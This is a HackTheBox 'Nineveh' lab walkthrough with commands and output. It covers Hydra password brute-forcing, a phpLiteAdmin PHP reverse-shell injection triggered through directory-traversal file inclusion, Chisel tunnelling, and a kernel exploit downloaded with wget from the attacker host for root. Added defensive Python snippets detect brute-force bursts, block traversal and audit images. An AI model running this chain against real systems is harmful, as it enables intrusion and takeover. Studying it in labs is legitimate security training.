HackTheBox: Nineveh

The first step was to run Nmap against the Nineveh machine:

# Nmap 7.91 scan initiated Thu Dec 31 08:51:45 2020 as: nmap -oN scan -sC -O -sV -p- 10.10.10.43
Nmap scan report for 10.10.10.43
Host is up (0.042s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.12 (91%), Linux 3.13 (91%), Linux 3.13 or 4.2 (91%), Linux 3.16 - 4.6 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%), Linux 4.2 (91%), Linux 4.4 (91%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 31 08:56:11 2020 -- 1 IP address (1 host up) scanned in 267.01 seconds

Both ports 80 and 443 appear to be open. I started by browsing to port 80 and was presented with the following login page.

I ran Hydra against this login form to see if it had weak credentials:

┌──(root💀kali)-[/home/kali/Documents/nineveh]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^&Login=Login:invalid"   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-31 09:45:46
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=admin&password=^PASS^&Login=Login:invalid

[STATUS] 2618.00 tries/min, 2618 tries in 00:01h, 14341781 to do in 91:19h, 16 active
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-31 09:47:44

As you can see from the output, I used the RockYou wordlist and the password 1q2w3e4r5t was found for the username admin. I then logged into the admin panel.

The admin interface only contained a single page which included the following note:

Have you fixed the login page yet! hardcoded username and password is really bad idea!

check your serect folder to get in! figure it out! this is your challenge

Improve the db interface.
~amrois


This note was pulled from a text file stored on the webserver. This was evident from the page URL, which includes the text file ninevehNotes.txt:

http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt

Because there was no more content on this page for now, I decided to move on to the site hosted on port 443.

This page contains a single image. I ran GoBuster against this page and discovered the db directory:

┌──(root💀kali)-[/home/kali/Documents/nineveh]
└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt --url https://10.10.10.43/ -k                                 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.43/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/03 10:33:22 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/db (Status: 301)
/server-status (Status: 403)
===============================================================
2021/01/03 10:34:22 Finished
===============================================================

Browsing to this directory brings me to a phpLiteAdmin 1.9 login form.

I then ran Hydra against this login form and discovered password123 was being used.

┌──(root💀kali)-[/home/kali]
└─# hydra 10.10.10.43 https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -l admin -P /usr/share/wordlists/rockyou.txt
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-02 10:55:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect


[443][http-post-form] host: 10.10.10.43   login: admin   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-02 10:56:16
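
Both password-guessing runs above leave the same trace in the web server's access log: a burst of POSTs from one address to one login URL. The following is an added example, not part of the original write-up, that flags such bursts in Apache combined-format logs; the sample log lines, the 60-second window and the threshold of 20 are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Login endpoints named in this write-up.
LOGIN_PATHS = {"/department/login.php", "/db/index.php"}
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*"'
)

def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Return {(ip, path): peak number of POSTs seen inside one sliding
    window} for every pair whose peak reaches the threshold."""
    recent = defaultdict(deque)
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["url"].split("?", 1)[0]
        if path not in LOGIN_PATHS:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        key = (m["ip"], path)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:      # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

def sample_log():
    """Constructed sample: 45 POSTs in 45 seconds from one host, plus one
    ordinary login and one GET from another host."""
    fmt = '{ip} - - [31/Dec/2020:09:46:{s:02d} +0000] "{req} HTTP/1.1" 200 512 "-" "-"'
    lines = [fmt.format(ip="10.10.14.19", s=s, req="POST /department/login.php")
             for s in range(45)]
    lines.append(fmt.format(ip="192.0.2.10", s=10, req="POST /department/login.php"))
    lines.append(fmt.format(ip="192.0.2.10", s=11, req="GET /department/manage.php"))
    return lines

if __name__ == "__main__":
    for (ip, path), peak in find_bruteforce(sample_log()).items():
        print(f"{ip} sent {peak} POSTs to {path} within one window")
```

Rate limiting or account lockout on the two login forms addresses the same burst at the source.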

With this password I was able to log in to the phpLiteAdmin web interface. I discovered an exploit which allows you to create a new database with a .php extension, which you can then execute as remote code. I followed the instructions and created a database called test.php from the phpLiteAdmin web interface. I then opened the table, opened the insert tab and copied in the code from /usr/share/webshells/php/php-reverse-shell.php, found by default in Kali, making sure to modify the IP address in the script to match my own. I then inserted this into the database.

By going back to the homepage we can see that the database file (test.php) is stored in /var/tmp/test.php

Now a method is needed to execute this file. I began by starting a netcat listener on port 1234 to capture the reverse shell:

┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes]
└─# nc -nvlp 1234        
listening on [any] 1234 ...

I went back to the page hosted on port 80 and modified the URL using directory traversal to execute /var/tmp/test.php rather than files/ninevehNotes.txt, by browsing to the following URL:

http://10.10.10.43/department/manage.php?notes=../../../../../../var/tmp/test.php

This however would not work and kept reporting “No Note is selected”. I did find however that if the filename ninevehNotes is included in the request then a different error is shown:

Warning:  include(files/ninevehNotes.tx): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31



Warning:  include(): Failed opening 'files/ninevehNotes.tx' for inclusion (include_path='.:/usr/share/php') in /var/www/html/department/manage.php on line 31

Because of this, I browsed back to the phpLiteAdmin interface and renamed the database to ninevehNotes.php. I then made a request to:

http://10.10.10.43/department/manage.php?notes=../../../../../../var/tmp/ninevehNotes.php

This worked successfully and a reverse shell was captured.

┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes]
└─# nc -nvlp 1234        
listening on [any] 1234 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.43] 49624
Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 08:35:53 up  3:36,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
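
The behaviour above, where a value is rejected until it mentions ninevehNotes and is then passed to include(), points to a substring filter in front of a file inclusion. The following is an added example, not code from manage.php or from the original write-up: it models that assumed filter next to a hardened resolver and runs both over the three request values shown in this write-up. The function names and the .txt-only rule are assumptions.

```python
import os

APP_DIR = "/var/www/html/department"        # taken from the include() warning above
NOTES_DIR = os.path.join(APP_DIR, "files")  # where files/ninevehNotes.txt lives

def weak_check(param):
    """Assumed shape of the original filter (inferred from the behaviour
    described above, not taken from manage.php): any value that mentions
    the expected note name is accepted."""
    return "ninevehNotes" in param

def resolve_note(param):
    """Hardened form: return the absolute path of a .txt note inside
    NOTES_DIR, or None if the value resolves anywhere else."""
    if "\x00" in param:
        return None
    root = os.path.realpath(NOTES_DIR)
    candidate = os.path.realpath(os.path.join(APP_DIR, param))
    if os.path.commonpath([candidate, root]) != root:
        return None      # left the notes directory via ../ or an absolute path
    if not candidate.endswith(".txt"):
        return None      # notes are plain text only
    return candidate

# Values taken from the requests shown in this write-up.
REQUESTS = [
    "files/ninevehNotes.txt",
    "../../../../../../var/tmp/test.php",
    "../../../../../../var/tmp/ninevehNotes.php",
]

def compare(params=REQUESTS):
    """Return (param, accepted by weak filter, accepted by hardened resolver)."""
    return [(p, weak_check(p), resolve_note(p) is not None) for p in params]

if __name__ == "__main__":
    for row in compare():
        print(row)
```

In PHP the equivalent is realpath() followed by a directory-prefix comparison, and reading the note with file_get_contents() rather than include() so that file contents are never executed as code.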

I did some browsing around the machine and found that there was a secure_notes folder in /var/www/ssl/secure_notes.

$ dir
index.html  nineveh.png
$ pwd
/var/www/ssl/secure_notes
$ 

This page contains the following image:

I downloaded this image to the Kali machine with wget and ran strings against it.

┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes]
└─# strings nineveh.png  


-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar  
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

As you can see from the output, embedded in the image is a private RSA key. I extracted this key out of the file and saved it as nin.pub to be used later on.
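
The strings output shows a tar archive (the ustar marker) and a PEM private key stored after the image data. The following is an added example, not part of the original write-up, of a pre-publication check for web-served PNG files: it walks the chunk list, measures what follows IEND, and looks for a tar header or a private-key marker. The sample image and trailer are constructed and contain no key material.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
PEM_RE = re.compile(rb"-----BEGIN ([A-Z ]*)PRIVATE KEY-----")

def png_trailer(data):
    """Walk the PNG chunk list and return the bytes that follow IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length          # length + type + body + CRC
        if end > len(data):
            raise ValueError("truncated chunk")
        if ctype == b"IEND":
            return data[end:]
        pos = end
    raise ValueError("no IEND chunk")

def audit_image(data):
    """Report appended data, a tar header at its start, and PEM key markers."""
    trailer = png_trailer(data)
    return {
        "trailing_bytes": len(trailer),
        "tar_magic": trailer[257:262] == b"ustar",   # magic field of a tar header
        "private_key": bool(PEM_RE.search(data)),
    }

def _chunk(ctype, body):
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def sample_png(trailer=b""):
    """Constructed 1x1 grayscale PNG, optionally followed by extra bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
            + _chunk(b"IEND", b"") + trailer)

def sample_trailer():
    """Constructed tar-style header block plus a placeholder PEM marker."""
    hdr = bytearray(512)
    hdr[0:7] = b"secret/"
    hdr[257:262] = b"ustar"
    return bytes(hdr) + (b"-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER\n"
                         b"-----END RSA PRIVATE KEY-----\n")
```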

I next did some more investigation through the reverse shell and found that it was listening on port 22, even though this wasn’t detected by the initial Nmap scan.

$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 10.10.10.43:34960       10.10.14.19:1234        ESTABLISHED off (0.00/0/0)
tcp        0      0 10.10.10.43:443         10.10.14.19:59276       TIME_WAIT   timewait (51.58/0/0)
tcp        0      0 10.10.10.43:80          10.10.14.19:55812       ESTABLISHED keepalive (7203.23/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
udp        0      0 10.10.10.43:35020       1.1.1.1:53              ESTABLISHED off (0.00/0/0)
udp        0      0 10.10.10.43:47875       1.0.0.1:53              ESTABLISHED off (0.00/0/0)
Active UNIX domain sockets (servers and established)

I decided to forward this port to my Kali machine so it could be accessed and logged into using the previously captured private key. I started a Chisel server on the Kali machine:

┌──(root💀kali)-[/home/kali/Documents/nineveh]
└─# ./chisel_1.7.3_linux_amd64 server -p 2700 -reverse -v
2021/01/03 09:36:34 server: Reverse tunnelling enabled
2021/01/03 09:36:34 server: Fingerprint +Vgh/6RQNjjkwJCxTcS9GahcQIIBe9BrBOVhaMH9gZs=
2021/01/03 09:36:34 server: Listening on http://0.0.0.0:2700

I then downloaded the Chisel client to the Nineveh machine and executed it, forwarding port 22 to my Kali machine on port 2800:

$ ./chisel_1.7.3_linux_amd64 client 10.10.14.19:2700 R:2800:127.0.0.1:22
2021/01/03 08:36:14 client: Connecting to ws://10.10.14.19:2700
2021/01/03 08:36:40 client: Connected (Latency 26.49034ms)

I then logged into the forwarded SSH port from Kali using the nin.pub private key captured before:

┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes]
└─# ssh -i nin.pub amrois@127.0.0.1 -p 2800
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

287 packages can be updated.
206 updates are security updates.


You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ ls
user.txt
amrois@nineveh:~$ cat user.txt 
[REDACTED]

As you can see, this was successful and I was able to capture the user flag. The next step was to escalate privileges. By running “uname -r” I was able to identify the Linux kernel version as 4.4.0-62-generic. There is an exploit available for this kernel that allows privilege escalation. I downloaded the exploit to the Nineveh machine and ran it.

amrois@nineveh:/tmp$ wget http://10.10.14.19:8000/comp
--2021-01-03 09:21:39--  http://10.10.14.19:8000/comp
Connecting to 10.10.14.19:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: ‘comp’

comp                                                       100%[=======================================================================================================================================>]  17.46K  --.-KB/s    in 0.02s   

2021-01-03 09:21:39 (728 KB/s) - ‘comp’ saved [17880/17880]

amrois@nineveh:/tmp$ chmod +x comp
amrois@nineveh:/tmp$ ./comp
task_struct = ffff880039eb3800
uidptr = ffff88003c7f6d84
spawning root shell

root@nineveh:/tmp# cd /root/

root@nineveh:/root# cd Desktop

root@nineveh:/root# ls
root.txt  test.txt  vulnScan.sh

root@nineveh:/root# cat root.txt
[REDACTED]

As you can see from the output, this exploit was successful and I was able to capture the root flag.
